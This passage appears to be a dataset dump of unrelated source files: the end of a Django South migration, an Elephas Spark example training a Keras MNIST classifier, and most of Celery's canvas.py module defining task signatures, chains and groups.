'etag': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'feed_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'status': ('django.db.models.fields.IntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'webpage': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'when_submitted': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'auth.group': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'unique': 'True'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
},
'localtv.openiduser': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'unique': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'localtv.profile': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['localtv']
| agpl-3.0 | -6,726,288,681,998,937,000 | 71.390863 | 172 | 0.539934 | false | 3.65292 | false | false | false |
maxpumperla/elephas | examples/mnist_mlp_spark_asynchronous.py | 1 | 1835 | from tensorflow.keras.datasets import mnist
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Activation
from tensorflow.keras.optimizers import SGD
from tensorflow.keras.utils import to_categorical
from elephas.spark_model import SparkModel
from elephas.utils.rdd_utils import to_simple_rdd
from pyspark import SparkContext, SparkConf
# Define basic parameters
batch_size = 64
nb_classes = 10
epochs = 1
# Create Spark context
conf = SparkConf().setAppName('Mnist_Spark_MLP').setMaster('local[8]')
sc = SparkContext(conf=conf)
# Load data
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(60000, 784)
x_test = x_test.reshape(10000, 784)
x_train = x_train.astype("float32")
x_test = x_test.astype("float32")
x_train /= 255
x_test /= 255
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
# Convert class vectors to binary class matrices
y_train = to_categorical(y_train, nb_classes)
y_test = to_categorical(y_test, nb_classes)
model = Sequential()
model.add(Dense(128, input_dim=784))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense(128))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense(10))
model.add(Activation('softmax'))
sgd = SGD(lr=0.1)
model.compile(sgd, 'categorical_crossentropy', ['acc'])
# Build RDD from numpy features and labels
rdd = to_simple_rdd(sc, x_train, y_train)
# Initialize SparkModel from tensorflow.keras model and Spark context
spark_model = SparkModel(model, mode='asynchronous')
# Train Spark model
spark_model.fit(rdd, epochs=epochs, batch_size=batch_size, verbose=2, validation_split=0.1)
# Evaluate Spark model by evaluating the underlying model
score = spark_model.evaluate(x_test, y_test, verbose=2)
print('Test accuracy:', score[1])
| mit | 4,591,990,503,040,828,000 | 29.081967 | 91 | 0.751499 | false | 3.073702 | true | false | false |
chugunovyar/factoryForBuild | env/lib/python2.7/site-packages/celery/canvas.py | 2 | 49586 | # -*- coding: utf-8 -*-
"""Composing task work-flows.
.. seealso:
You should import these from :mod:`celery` and not this module.
"""
from __future__ import absolute_import, unicode_literals
import itertools
import operator
import sys
from collections import MutableSequence, deque
from copy import deepcopy
from functools import partial as _partial, reduce
from operator import itemgetter
from kombu.utils.functional import fxrange, reprcall
from kombu.utils.objects import cached_property
from kombu.utils.uuid import uuid
from vine import barrier
from celery._state import current_app
from celery.five import python_2_unicode_compatible
from celery.local import try_import
from celery.result import GroupResult
from celery.utils import abstract
from celery.utils.functional import (
maybe_list, is_list, _regen, regen, chunks as _chunks,
seq_concat_seq, seq_concat_item,
)
from celery.utils.objects import getitem_property
from celery.utils.text import truncate, remove_repeating_from_task
__all__ = [
'Signature', 'chain', 'xmap', 'xstarmap', 'chunks',
'group', 'chord', 'signature', 'maybe_signature',
]
PY3 = sys.version_info[0] == 3
# json in Python 2.7 borks if dict contains byte keys.
JSON_NEEDS_UNICODE_KEYS = PY3 and not try_import('simplejson')
def maybe_unroll_group(g):
"""Unroll group with only one member."""
# Issue #1656
try:
size = len(g.tasks)
except TypeError:
try:
size = g.tasks.__length_hint__()
except (AttributeError, TypeError):
return g
else:
return list(g.tasks)[0] if size == 1 else g
else:
return g.tasks[0] if size == 1 else g
def task_name_from(task):
return getattr(task, 'name', task)
def _upgrade(fields, sig):
"""Used by custom signatures in .from_dict, to keep common fields."""
sig.update(chord_size=fields.get('chord_size'))
return sig
@abstract.CallableSignature.register
@python_2_unicode_compatible
class Signature(dict):
"""Task Signature.
Class that wraps the arguments and execution options
for a single task invocation.
Used as the parts in a :class:`group` and other constructs,
or to pass tasks around as callbacks while being compatible
with serializers with a strict type subset.
Signatures can also be created from tasks:
- Using the ``.signature()`` method that has the same signature
as ``Task.apply_async``:
.. code-block:: pycon
>>> add.signature(args=(1,), kwargs={'kw': 2}, options={})
- or the ``.s()`` shortcut that works for star arguments:
.. code-block:: pycon
>>> add.s(1, kw=2)
- the ``.s()`` shortcut does not allow you to specify execution options
but there's a chaning `.set` method that returns the signature:
.. code-block:: pycon
>>> add.s(2, 2).set(countdown=10).set(expires=30).delay()
Note:
You should use :func:`~celery.signature` to create new signatures.
The ``Signature`` class is the type returned by that function and
should be used for ``isinstance`` checks for signatures.
See Also:
:ref:`guide-canvas` for the complete guide.
Arguments:
task (Task, str): Either a task class/instance, or the name of a task.
args (Tuple): Positional arguments to apply.
kwargs (Dict): Keyword arguments to apply.
options (Dict): Additional options to :meth:`Task.apply_async`.
Note:
If the first argument is a :class:`dict`, the other
arguments will be ignored and the values in the dict will be used
instead::
>>> s = signature('tasks.add', args=(2, 2))
>>> signature(s)
{'task': 'tasks.add', args=(2, 2), kwargs={}, options={}}
"""
TYPES = {}
_app = _type = None
@classmethod
def register_type(cls, name=None):
def _inner(subclass):
cls.TYPES[name or subclass.__name__] = subclass
return subclass
return _inner
@classmethod
def from_dict(cls, d, app=None):
typ = d.get('subtask_type')
if typ:
target_cls = cls.TYPES[typ]
if target_cls is not cls:
return target_cls.from_dict(d, app=app)
return Signature(d, app=app)
def __init__(self, task=None, args=None, kwargs=None, options=None,
type=None, subtask_type=None, immutable=False,
app=None, **ex):
self._app = app
if isinstance(task, dict):
super(Signature, self).__init__(task) # works like dict(d)
else:
# Also supports using task class/instance instead of string name.
try:
task_name = task.name
except AttributeError:
task_name = task
else:
self._type = task
super(Signature, self).__init__(
task=task_name, args=tuple(args or ()),
kwargs=kwargs or {},
options=dict(options or {}, **ex),
subtask_type=subtask_type,
immutable=immutable,
chord_size=None,
)
def __call__(self, *partial_args, **partial_kwargs):
"""Call the task directly (in the current process)."""
args, kwargs, _ = self._merge(partial_args, partial_kwargs, None)
return self.type(*args, **kwargs)
def delay(self, *partial_args, **partial_kwargs):
"""Shortcut to :meth:`apply_async` using star arguments."""
return self.apply_async(partial_args, partial_kwargs)
def apply(self, args=(), kwargs={}, **options):
"""Call task locally.
Same as :meth:`apply_async` but executed the task inline instead
of sending a task message.
"""
# For callbacks: extra args are prepended to the stored args.
args, kwargs, options = self._merge(args, kwargs, options)
return self.type.apply(args, kwargs, **options)
def apply_async(self, args=(), kwargs={}, route_name=None, **options):
"""Apply this task asynchronously.
Arguments:
args (Tuple): Partial args to be prepended to the existing args.
kwargs (Dict): Partial kwargs to be merged with existing kwargs.
options (Dict): Partial options to be merged
with existing options.
Returns:
~@AsyncResult: promise of future evaluation.
See also:
:meth:`[email protected]_async` and the :ref:`guide-calling` guide.
"""
try:
_apply = self._apply_async
except IndexError: # pragma: no cover
# no tasks for chain, etc to find type
return
# For callbacks: extra args are prepended to the stored args.
if args or kwargs or options:
args, kwargs, options = self._merge(args, kwargs, options)
else:
args, kwargs, options = self.args, self.kwargs, self.options
# pylint: disable=too-many-function-args
# Borks on this, as it's a property
return _apply(args, kwargs, **options)
def _merge(self, args=(), kwargs={}, options={}, force=False):
if self.immutable and not force:
return (self.args, self.kwargs,
dict(self.options, **options) if options else self.options)
return (tuple(args) + tuple(self.args) if args else self.args,
dict(self.kwargs, **kwargs) if kwargs else self.kwargs,
dict(self.options, **options) if options else self.options)
def clone(self, args=(), kwargs={}, **opts):
"""Create a copy of this signature.
Arguments:
args (Tuple): Partial args to be prepended to the existing args.
kwargs (Dict): Partial kwargs to be merged with existing kwargs.
options (Dict): Partial options to be merged with
existing options.
"""
# need to deepcopy options so origins links etc. is not modified.
if args or kwargs or opts:
args, kwargs, opts = self._merge(args, kwargs, opts)
else:
args, kwargs, opts = self.args, self.kwargs, self.options
s = Signature.from_dict({'task': self.task, 'args': tuple(args),
'kwargs': kwargs, 'options': deepcopy(opts),
'subtask_type': self.subtask_type,
'chord_size': self.chord_size,
'immutable': self.immutable}, app=self._app)
s._type = self._type
return s
partial = clone
def freeze(self, _id=None, group_id=None, chord=None,
root_id=None, parent_id=None):
"""Finalize the signature by adding a concrete task id.
The task won't be called and you shouldn't call the signature
twice after freezing it as that'll result in two task messages
using the same task id.
Returns:
~@AsyncResult: promise of future evaluation.
"""
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
opts = self.options
try:
tid = opts['task_id']
except KeyError:
tid = opts['task_id'] = _id or uuid()
if root_id:
opts['root_id'] = root_id
if parent_id:
opts['parent_id'] = parent_id
if 'reply_to' not in opts:
opts['reply_to'] = self.app.oid
if group_id:
opts['group_id'] = group_id
if chord:
opts['chord'] = chord
# pylint: disable=too-many-function-args
# Borks on this, as it's a property.
return self.AsyncResult(tid)
_freeze = freeze
def replace(self, args=None, kwargs=None, options=None):
"""Replace the args, kwargs or options set for this signature.
These are only replaced if the argument for the section is
not :const:`None`.
"""
s = self.clone()
if args is not None:
s.args = args
if kwargs is not None:
s.kwargs = kwargs
if options is not None:
s.options = options
return s
def set(self, immutable=None, **options):
"""Set arbitrary execution options (same as ``.options.update(…)``).
Returns:
Signature: This is a chaining method call
(i.e., it will return ``self``).
"""
if immutable is not None:
self.set_immutable(immutable)
self.options.update(options)
return self
def set_immutable(self, immutable):
self.immutable = immutable
def _with_list_option(self, key):
items = self.options.setdefault(key, [])
if not isinstance(items, MutableSequence):
items = self.options[key] = [items]
return items
def append_to_list_option(self, key, value):
items = self._with_list_option(key)
if value not in items:
items.append(value)
return value
def extend_list_option(self, key, value):
items = self._with_list_option(key)
items.extend(maybe_list(value))
def link(self, callback):
"""Add callback task to be applied if this task succeeds.
Returns:
Signature: the argument passed, for chaining
or use with :func:`~functools.reduce`.
"""
return self.append_to_list_option('link', callback)
def link_error(self, errback):
"""Add callback task to be applied on error in task execution.
Returns:
Signature: the argument passed, for chaining
or use with :func:`~functools.reduce`.
"""
return self.append_to_list_option('link_error', errback)
def on_error(self, errback):
"""Version of :meth:`link_error` that supports chaining.
on_error chains the original signature, not the errback so::
>>> add.s(2, 2).on_error(errback.s()).delay()
calls the ``add`` task, not the ``errback`` task, but the
reverse is true for :meth:`link_error`.
"""
self.link_error(errback)
return self
def flatten_links(self):
"""Return a recursive list of dependencies.
"unchain" if you will, but with links intact.
"""
return list(itertools.chain.from_iterable(itertools.chain(
[[self]],
(link.flatten_links()
for link in maybe_list(self.options.get('link')) or [])
)))
def __or__(self, other):
# These could be implemented in each individual class,
# I'm sure, but for now we have this.
if isinstance(other, chord) and len(other.tasks) == 1:
# chord with one header -> header[0] | body
other = other.tasks[0] | other.body
if isinstance(self, group):
if isinstance(other, group):
# group() | group() -> single group
return group(
itertools.chain(self.tasks, other.tasks), app=self.app)
# group() | task -> chord
if len(self.tasks) == 1:
# group(ONE.s()) | other -> ONE.s() | other
# Issue #3323
return self.tasks[0] | other
return chord(self, body=other, app=self._app)
elif isinstance(other, group):
# unroll group with one member
other = maybe_unroll_group(other)
if isinstance(self, _chain):
# chain | group() -> chain
sig = self.clone()
sig.tasks.append(other)
return sig
# task | group() -> chain
return _chain(self, other, app=self.app)
if not isinstance(self, _chain) and isinstance(other, _chain):
# task | chain -> chain
return _chain(
seq_concat_seq((self,), other.tasks), app=self._app)
elif isinstance(other, _chain):
# chain | chain -> chain
sig = self.clone()
if isinstance(sig.tasks, tuple):
sig.tasks = list(sig.tasks)
sig.tasks.extend(other.tasks)
return sig
elif isinstance(self, chord):
# chord(ONE, body) | other -> ONE | body | other
# chord with one header task is unecessary.
if len(self.tasks) == 1:
return self.tasks[0] | self.body | other
# chord | task -> attach to body
sig = self.clone()
sig.body = sig.body | other
return sig
elif isinstance(other, Signature):
if isinstance(self, _chain):
if isinstance(self.tasks[-1], group):
# CHAIN [last item is group] | TASK -> chord
sig = self.clone()
sig.tasks[-1] = chord(
sig.tasks[-1], other, app=self._app)
return sig
elif isinstance(self.tasks[-1], chord):
# CHAIN [last item is chord] -> chain with chord body.
sig = self.clone()
sig.tasks[-1].body = sig.tasks[-1].body | other
return sig
else:
# chain | task -> chain
return _chain(
seq_concat_item(self.tasks, other), app=self._app)
# task | task -> chain
return _chain(self, other, app=self._app)
return NotImplemented
def election(self):
type = self.type
app = type.app
tid = self.options.get('task_id') or uuid()
with app.producer_or_acquire(None) as P:
props = type.backend.on_task_call(P, tid)
app.control.election(tid, 'task', self.clone(task_id=tid, **props),
connection=P.connection)
return type.AsyncResult(tid)
def reprcall(self, *args, **kwargs):
args, kwargs, _ = self._merge(args, kwargs, {}, force=True)
return reprcall(self['task'], args, kwargs)
def __deepcopy__(self, memo):
memo[id(self)] = self
return dict(self)
def __invert__(self):
return self.apply_async().get()
def __reduce__(self):
# for serialization, the task type is lazily loaded,
# and not stored in the dict itself.
return signature, (dict(self),)
def __json__(self):
return dict(self)
def __repr__(self):
return self.reprcall()
if JSON_NEEDS_UNICODE_KEYS: # pragma: no cover
def items(self):
for k, v in dict.items(self):
yield k.decode() if isinstance(k, bytes) else k, v
@property
def name(self):
# for duck typing compatibility with Task.name
return self.task
@cached_property
def type(self):
return self._type or self.app.tasks[self['task']]
@cached_property
def app(self):
return self._app or current_app
@cached_property
def AsyncResult(self):
try:
return self.type.AsyncResult
except KeyError: # task not registered
return self.app.AsyncResult
@cached_property
def _apply_async(self):
try:
return self.type.apply_async
except KeyError:
return _partial(self.app.send_task, self['task'])
id = getitem_property('options.task_id', 'Task UUID')
parent_id = getitem_property('options.parent_id', 'Task parent UUID.')
root_id = getitem_property('options.root_id', 'Task root UUID.')
task = getitem_property('task', 'Name of task.')
args = getitem_property('args', 'Positional arguments to task.')
kwargs = getitem_property('kwargs', 'Keyword arguments to task.')
options = getitem_property('options', 'Task execution options.')
subtask_type = getitem_property('subtask_type', 'Type of signature')
chord_size = getitem_property(
'chord_size', 'Size of chord (if applicable)')
immutable = getitem_property(
'immutable', 'Flag set if no longer accepts new arguments')
@Signature.register_type(name='chain')
@python_2_unicode_compatible
class _chain(Signature):
tasks = getitem_property('kwargs.tasks', 'Tasks in chain.')
@classmethod
def from_dict(cls, d, app=None):
tasks = d['kwargs']['tasks']
if tasks:
if isinstance(tasks, tuple): # aaaargh
tasks = d['kwargs']['tasks'] = list(tasks)
# First task must be signature object to get app
tasks[0] = maybe_signature(tasks[0], app=app)
return _upgrade(d, _chain(tasks, app=app, **d['options']))
def __init__(self, *tasks, **options):
tasks = (regen(tasks[0]) if len(tasks) == 1 and is_list(tasks[0])
else tasks)
Signature.__init__(
self, 'celery.chain', (), {'tasks': tasks}, **options
)
self._use_link = options.pop('use_link', None)
self.subtask_type = 'chain'
self._frozen = None
def __call__(self, *args, **kwargs):
if self.tasks:
return self.apply_async(args, kwargs)
def clone(self, *args, **kwargs):
to_signature = maybe_signature
s = Signature.clone(self, *args, **kwargs)
s.kwargs['tasks'] = [
to_signature(sig, app=self._app, clone=True)
for sig in s.kwargs['tasks']
]
return s
def apply_async(self, args=(), kwargs={}, **options):
# python is best at unpacking kwargs, so .run is here to do that.
app = self.app
if app.conf.task_always_eager:
return self.apply(args, kwargs, **options)
return self.run(args, kwargs, app=app, **(
dict(self.options, **options) if options else self.options))
def run(self, args=(), kwargs={}, group_id=None, chord=None,
task_id=None, link=None, link_error=None, publisher=None,
producer=None, root_id=None, parent_id=None, app=None, **options):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
app = app or self.app
use_link = self._use_link
if use_link is None and app.conf.task_protocol == 1:
use_link = True
args = (tuple(args) + tuple(self.args)
if args and not self.immutable else self.args)
if self._frozen:
tasks, results = self._frozen
else:
tasks, results = self.prepare_steps(
args, self.tasks, root_id, parent_id, link_error, app,
task_id, group_id, chord,
)
if results:
if link:
tasks[0].extend_list_option('link', link)
first_task = tasks.pop()
# chain option may already be set, resulting in
# "multiple values for keyword argument 'chain'" error.
# Issue #3379.
options['chain'] = tasks if not use_link else None
first_task.apply_async(**options)
return results[0]
def freeze(self, _id=None, group_id=None, chord=None,
root_id=None, parent_id=None):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
_, results = self._frozen = self.prepare_steps(
self.args, self.tasks, root_id, parent_id, None,
self.app, _id, group_id, chord, clone=False,
)
return results[0]
def prepare_steps(self, args, tasks,
root_id=None, parent_id=None, link_error=None, app=None,
last_task_id=None, group_id=None, chord_body=None,
clone=True, from_dict=Signature.from_dict):
app = app or self.app
# use chain message field for protocol 2 and later.
# this avoids pickle blowing the stack on the recursion
# required by linking task together in a tree structure.
# (why is pickle using recursion? or better yet why cannot python
# do tail call optimization making recursion actually useful?)
use_link = self._use_link
if use_link is None and app.conf.task_protocol == 1:
use_link = True
steps = deque(tasks)
steps_pop = steps.pop
steps_extend = steps.extend
prev_task = None
prev_res = None
tasks, results = [], []
i = 0
# NOTE: We are doing this in reverse order.
# The result is a list of tasks in reverse order, that is
# passed as the ``chain`` message field.
# As it's reversed the worker can just do ``chain.pop()`` to
# get the next task in the chain.
while steps:
task = steps_pop()
is_first_task, is_last_task = not steps, not i
if not isinstance(task, abstract.CallableSignature):
task = from_dict(task, app=app)
if isinstance(task, group):
task = maybe_unroll_group(task)
# first task gets partial args from chain
if clone:
task = task.clone(args) if is_first_task else task.clone()
elif is_first_task:
task.args = tuple(args) + tuple(task.args)
if isinstance(task, _chain):
# splice the chain
steps_extend(task.tasks)
continue
if isinstance(task, group) and prev_task:
# automatically upgrade group(...) | s to chord(group, s)
# for chords we freeze by pretending it's a normal
# signature instead of a group.
tasks.pop()
results.pop()
task = chord(
task, body=prev_task,
task_id=prev_res.task_id, root_id=root_id, app=app,
)
if is_last_task:
# chain(task_id=id) means task id is set for the last task
# in the chain. If the chord is part of a chord/group
# then that chord/group must synchronize based on the
# last task in the chain, so we only set the group_id and
# chord callback for the last task.
res = task.freeze(
last_task_id,
root_id=root_id, group_id=group_id, chord=chord_body,
)
else:
res = task.freeze(root_id=root_id)
i += 1
if prev_task:
if use_link:
# link previous task to this task.
task.link(prev_task)
if prev_res and not prev_res.parent:
prev_res.parent = res
if link_error:
for errback in maybe_list(link_error):
task.link_error(errback)
tasks.append(task)
results.append(res)
prev_task, prev_res = task, res
if isinstance(task, chord):
app.backend.ensure_chords_allowed()
# If the task is a chord, and the body is a chain
# the chain has already been prepared, and res is
# set to the last task in the callback chain.
# We need to change that so that it points to the
# group result object.
node = res
while node.parent:
node = node.parent
prev_res = node
return tasks, results
def apply(self, args=(), kwargs={}, **options):
last, fargs = None, args
for task in self.tasks:
res = task.clone(fargs).apply(
last and (last.get(),), **dict(self.options, **options))
res.parent, last, fargs = last, res, None
return last
@property
def app(self):
app = self._app
if app is None:
try:
app = self.tasks[0]._app
except LookupError:
pass
return app or current_app
def __repr__(self):
if not self.tasks:
return '<{0}@{1:#x}: empty>'.format(
type(self).__name__, id(self))
return remove_repeating_from_task(
self.tasks[0]['task'],
' | '.join(repr(t) for t in self.tasks))
class chain(_chain):
"""Chain tasks together.
Each tasks follows one another,
by being applied as a callback of the previous task.
Note:
If called with only one argument, then that argument must
be an iterable of tasks to chain: this allows us
to use generator expressions.
Example:
This is effectively :math:`((2 + 2) + 4)`:
.. code-block:: pycon
>>> res = chain(add.s(2, 2), add.s(4))()
>>> res.get()
8
Calling a chain will return the result of the last task in the chain.
You can get to the other tasks by following the ``result.parent``'s:
.. code-block:: pycon
>>> res.parent.get()
4
Using a generator expression:
.. code-block:: pycon
>>> lazy_chain = chain(add.s(i) for i in range(10))
>>> res = lazy_chain(3)
Arguments:
*tasks (Signature): List of task signatures to chain.
If only one argument is passed and that argument is
an iterable, then that'll be used as the list of signatures
to chain instead. This means that you can use a generator
expression.
Returns:
~celery.chain: A lazy signature that can be called to apply the first
task in the chain. When that task succeeed the next task in the
chain is applied, and so on.
"""
# could be function, but must be able to reference as :class:`chain`.
def __new__(cls, *tasks, **kwargs):
# This forces `chain(X, Y, Z)` to work the same way as `X | Y | Z`
if not kwargs and tasks:
if len(tasks) == 1 and is_list(tasks[0]):
# ensure chain(generator_expression) works.
tasks = tasks[0]
return reduce(operator.or_, tasks)
return super(chain, cls).__new__(cls, *tasks, **kwargs)
class _basemap(Signature):
_task_name = None
_unpack_args = itemgetter('task', 'it')
@classmethod
def from_dict(cls, d, app=None):
return _upgrade(
d, cls(*cls._unpack_args(d['kwargs']), app=app, **d['options']),
)
def __init__(self, task, it, **options):
Signature.__init__(
self, self._task_name, (),
{'task': task, 'it': regen(it)}, immutable=True, **options
)
def apply_async(self, args=(), kwargs={}, **opts):
# need to evaluate generators
task, it = self._unpack_args(self.kwargs)
return self.type.apply_async(
(), {'task': task, 'it': list(it)},
route_name=task_name_from(self.kwargs.get('task')), **opts
)
@Signature.register_type()
@python_2_unicode_compatible
class xmap(_basemap):
"""Map operation for tasks.
Note:
Tasks executed sequentially in process, this is not a
parallel operation like :class:`group`.
"""
_task_name = 'celery.map'
def __repr__(self):
task, it = self._unpack_args(self.kwargs)
return '[{0}(x) for x in {1}]'.format(
task.task, truncate(repr(it), 100))
@Signature.register_type()
@python_2_unicode_compatible
class xstarmap(_basemap):
"""Map operation for tasks, using star arguments."""
_task_name = 'celery.starmap'
def __repr__(self):
task, it = self._unpack_args(self.kwargs)
return '[{0}(*x) for x in {1}]'.format(
task.task, truncate(repr(it), 100))
@Signature.register_type()
class chunks(Signature):
"""Partition of tasks in n chunks."""
_unpack_args = itemgetter('task', 'it', 'n')
@classmethod
def from_dict(cls, d, app=None):
return _upgrade(
d, chunks(*cls._unpack_args(
d['kwargs']), app=app, **d['options']),
)
def __init__(self, task, it, n, **options):
Signature.__init__(
self, 'celery.chunks', (),
{'task': task, 'it': regen(it), 'n': n},
immutable=True, **options
)
def __call__(self, **options):
return self.apply_async(**options)
def apply_async(self, args=(), kwargs={}, **opts):
return self.group().apply_async(
args, kwargs,
route_name=task_name_from(self.kwargs.get('task')), **opts
)
def group(self):
# need to evaluate generators
task, it, n = self._unpack_args(self.kwargs)
return group((xstarmap(task, part, app=self._app)
for part in _chunks(iter(it), n)),
app=self._app)
@classmethod
def apply_chunks(cls, task, it, n, app=None):
return cls(task, it, n, app=app)()
def _maybe_group(tasks, app):
if isinstance(tasks, dict):
tasks = signature(tasks, app=app)
if isinstance(tasks, (group, _chain)):
tasks = tasks.tasks
elif isinstance(tasks, abstract.CallableSignature):
tasks = [tasks]
else:
tasks = [signature(t, app=app) for t in tasks]
return tasks
@Signature.register_type()
@python_2_unicode_compatible
class group(Signature):
"""Creates a group of tasks to be executed in parallel.
A group is lazy so you must call it to take action and evaluate
the group.
Note:
If only one argument is passed, and that argument is an iterable
then that'll be used as the list of tasks instead: this
allows us to use ``group`` with generator expressions.
Example:
>>> lazy_group = group([add.s(2, 2), add.s(4, 4)])
>>> promise = lazy_group() # <-- evaluate: returns lazy result.
>>> promise.get() # <-- will wait for the task to return
[4, 8]
Arguments:
*tasks (Signature): A list of signatures that this group will call.
If there's only one argument, and that argument is an iterable,
then that'll define the list of signatures instead.
**options (Any): Execution options applied to all tasks
in the group.
Returns:
~celery.group: signature that when called will then call all of the
tasks in the group (and return a :class:`GroupResult` instance
that can be used to inspect the state of the group).
"""
tasks = getitem_property('kwargs.tasks', 'Tasks in group.')
@classmethod
def from_dict(cls, d, app=None):
return _upgrade(
d, group(d['kwargs']['tasks'], app=app, **d['options']),
)
def __init__(self, *tasks, **options):
if len(tasks) == 1:
tasks = tasks[0]
if isinstance(tasks, group):
tasks = tasks.tasks
if not isinstance(tasks, _regen):
tasks = regen(tasks)
Signature.__init__(
self, 'celery.group', (), {'tasks': tasks}, **options
)
self.subtask_type = 'group'
def __call__(self, *partial_args, **options):
return self.apply_async(partial_args, **options)
def skew(self, start=1.0, stop=None, step=1.0):
it = fxrange(start, stop, step, repeatlast=True)
for task in self.tasks:
task.set(countdown=next(it))
return self
def apply_async(self, args=(), kwargs=None, add_to_parent=True,
producer=None, link=None, link_error=None, **options):
if link is not None:
raise TypeError('Cannot add link to group: use a chord')
if link_error is not None:
raise TypeError(
'Cannot add link to group: do that on individual tasks')
app = self.app
if app.conf.task_always_eager:
return self.apply(args, kwargs, **options)
if not self.tasks:
return self.freeze()
options, group_id, root_id = self._freeze_gid(options)
tasks = self._prepared(self.tasks, [], group_id, root_id, app)
p = barrier()
results = list(self._apply_tasks(tasks, producer, app, p,
args=args, kwargs=kwargs, **options))
result = self.app.GroupResult(group_id, results, ready_barrier=p)
p.finalize()
# - Special case of group(A.s() | group(B.s(), C.s()))
# That is, group with single item that's a chain but the
# last task in that chain is a group.
#
# We cannot actually support arbitrary GroupResults in chains,
# but this special case we can.
if len(result) == 1 and isinstance(result[0], GroupResult):
result = result[0]
parent_task = app.current_worker_task
if add_to_parent and parent_task:
parent_task.add_trail(result)
return result
def apply(self, args=(), kwargs={}, **options):
app = self.app
if not self.tasks:
return self.freeze() # empty group returns GroupResult
options, group_id, root_id = self._freeze_gid(options)
tasks = self._prepared(self.tasks, [], group_id, root_id, app)
return app.GroupResult(group_id, [
sig.apply(args=args, kwargs=kwargs, **options) for sig, _ in tasks
])
def set_immutable(self, immutable):
for task in self.tasks:
task.set_immutable(immutable)
def link(self, sig):
# Simply link to first task
sig = sig.clone().set(immutable=True)
return self.tasks[0].link(sig)
def link_error(self, sig):
sig = sig.clone().set(immutable=True)
return self.tasks[0].link_error(sig)
def _prepared(self, tasks, partial_args, group_id, root_id, app,
CallableSignature=abstract.CallableSignature,
from_dict=Signature.from_dict,
isinstance=isinstance, tuple=tuple):
for task in tasks:
if isinstance(task, CallableSignature):
# local sigs are always of type Signature, and we
# clone them to make sure we don't modify the originals.
task = task.clone()
else:
# serialized sigs must be converted to Signature.
task = from_dict(task, app=app)
if isinstance(task, group):
# needs yield_from :(
unroll = task._prepared(
task.tasks, partial_args, group_id, root_id, app,
)
for taskN, resN in unroll:
yield taskN, resN
else:
if partial_args and not task.immutable:
task.args = tuple(partial_args) + tuple(task.args)
yield task, task.freeze(group_id=group_id, root_id=root_id)
def _apply_tasks(self, tasks, producer=None, app=None, p=None,
add_to_parent=None, chord=None,
args=None, kwargs=None, **options):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
app = app or self.app
with app.producer_or_acquire(producer) as producer:
for sig, res in tasks:
sig.apply_async(producer=producer, add_to_parent=False,
chord=sig.options.get('chord') or chord,
args=args, kwargs=kwargs,
**options)
# adding callback to result, such that it will gradually
# fulfill the barrier.
#
# Using barrier.add would use result.then, but we need
# to add the weak argument here to only create a weak
# reference to the object.
if p and not p.cancelled and not p.ready:
p.size += 1
res.then(p, weak=True)
yield res # <-- r.parent, etc set in the frozen result.
def _freeze_gid(self, options):
# remove task_id and use that as the group_id,
# if we don't remove it then every task will have the same id...
options = dict(self.options, **options)
options['group_id'] = group_id = (
options.pop('task_id', uuid()))
return options, group_id, options.get('root_id')
def freeze(self, _id=None, group_id=None, chord=None,
root_id=None, parent_id=None):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
opts = self.options
try:
gid = opts['task_id']
except KeyError:
gid = opts['task_id'] = uuid()
if group_id:
opts['group_id'] = group_id
if chord:
opts['chord'] = chord
root_id = opts.setdefault('root_id', root_id)
parent_id = opts.setdefault('parent_id', parent_id)
new_tasks = []
# Need to unroll subgroups early so that chord gets the
# right result instance for chord_unlock etc.
results = list(self._freeze_unroll(
new_tasks, group_id, chord, root_id, parent_id,
))
if isinstance(self.tasks, MutableSequence):
self.tasks[:] = new_tasks
else:
self.tasks = new_tasks
return self.app.GroupResult(gid, results)
_freeze = freeze
def _freeze_unroll(self, new_tasks, group_id, chord, root_id, parent_id):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
stack = deque(self.tasks)
while stack:
task = maybe_signature(stack.popleft(), app=self._app).clone()
if isinstance(task, group):
stack.extendleft(task.tasks)
else:
new_tasks.append(task)
yield task.freeze(group_id=group_id,
chord=chord, root_id=root_id,
parent_id=parent_id)
def __repr__(self):
if self.tasks:
return remove_repeating_from_task(
self.tasks[0]['task'],
'group({0.tasks!r})'.format(self))
return 'group(<empty>)'
def __len__(self):
return len(self.tasks)
@property
def app(self):
app = self._app
if app is None:
try:
app = self.tasks[0].app
except LookupError:
pass
return app if app is not None else current_app
@Signature.register_type()
@python_2_unicode_compatible
class chord(Signature):
r"""Barrier synchronization primitive.
A chord consists of a header and a body.
